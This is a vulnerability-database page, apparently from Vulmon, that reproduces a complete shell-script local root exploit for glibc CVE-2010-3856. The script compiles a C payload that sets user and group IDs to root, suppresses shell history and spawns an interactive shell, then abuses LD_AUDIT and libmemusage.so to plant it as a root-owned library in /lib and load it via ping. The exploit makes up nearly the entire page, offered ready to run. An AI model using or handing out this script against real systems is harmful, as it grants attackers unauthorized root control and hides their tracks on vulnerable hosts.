Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root

Related Vulnerabilities: CVE-2010-3856  
Publish Date: 17 May 2013
Author: Todor Donev
Source 
                							

                #!/bin/sh
#
# [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit
#
# Edited by Todor Donev (todor dot donev at gmail dot com)
# This is another exploit for CVE-2010-3856
#
# Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov
# and Tsvetelina Emirska
#
# Another exploits:
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
# http://www.exploit-db.com/exploits/18105/
# http://seclists.org/fulldisclosure/2010/Oct/257
# http://seclists.org/bugtraq/2010/Oct/200
#
echo "[+] Setting umask to 0 so we have world writable files."
umask 0
echo "[+] Preparing binary payload.."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
    unlink("/lib/sploit.so");
    setuid(0);
    setgid(0);
    setenv("HISTFILE", "/dev/null", 1);
    execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null
echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/sploit.so
rm /tmp/payload.c /tmp/exploit
echo "[+] Executing payload.."
LD_AUDIT="sploit.so" ping
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started